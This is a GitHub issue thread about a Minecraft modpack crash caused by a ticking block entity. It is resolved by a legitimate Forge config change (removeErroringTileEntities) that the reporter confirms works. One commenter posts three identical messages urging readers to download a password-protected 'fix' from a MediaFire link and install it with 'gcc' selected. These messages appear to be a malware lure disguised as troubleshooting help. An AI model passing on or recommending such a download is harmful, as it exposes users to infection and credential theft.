### ISSUE TITLE
ticking block entity 

### ISSUE THREAD

**Issue by tobochos12** [ChosenArchitect/Project-Architect-2#185]
**Describe the bug**
-> I was placing down an entangled block connected to an ultimate Logistical pipe, but the game crashed. when I try to rejoin the game crashes again and shows the error code java.lang.StackOverflowError: Ticking block entity. how should i fix the issue? 

**Modpack version**
->3.5
**Java Version**
-> 1.20.1
**Modpack Launcher Used**
-> curseforge
**Ram Allocated**
-> 12000MB

**Additional context**
->here is the crash report [crash-2024-08-26_19.16.26-server.txt](https://github.com/user-attachments/files/16755915/crash-2024-08-26_19.16.26-server.txt)
it is on a singleplayer world.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by IRicTheCoder** [comment]
You can try following this tutorial and see if that fixes it:

> To enable the error fixing Forge setting for 1.13 and newer, please follow these steps:
> 
> Navigate to your instance folder and click your world folder. In this example, my world is called my-forge-world.
> 
> Within your world folder, click the folder called serverconfig.
> 
> Find the file forge-server.toml and click Edit.
> 
> Scroll down until you find the settings removeErroringEntities and removeErroringTileEntities which we've highlighted below.
> 
> Change both of the settings from false to true as shown below.
> 
> Then simply save the file and relaunch your modpack. When your pack starts, the new settings will take effect. When you next > connect to your save and load the chunk with the ticking block entity, Forge will attempt to automatically remove the block > > which is causing issues.
> 
> Once the problem has been fixed, we recommend changing the settings back to false to prevent any issues with your world.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tobochos12** [comment]
> You can try following this tutorial and see if that fixes it:
> 
> > To enable the error fixing Forge setting for 1.13 and newer, please follow these steps:
> > Navigate to your instance folder and click your world folder. In this example, my world is called my-forge-world.
> > Within your world folder, click the folder called serverconfig.
> > Find the file forge-server.toml and click Edit.
> > Scroll down until you find the settings removeErroringEntities and removeErroringTileEntities which we've highlighted below.
> > Change both of the settings from false to true as shown below.
> > Then simply save the file and relaunch your modpack. When your pack starts, the new settings will take effect. When you next > connect to your save and load the chunk with the ticking block entity, Forge will attempt to automatically remove the block > > which is causing issues.
> > Once the problem has been fixed, we recommend changing the settings back to false to prevent any issues with your world.

IT WORKED!!!! Thank YOU!!

**Comment by IRicTheCoder** [comment]
Since it worked will mark this as solved!
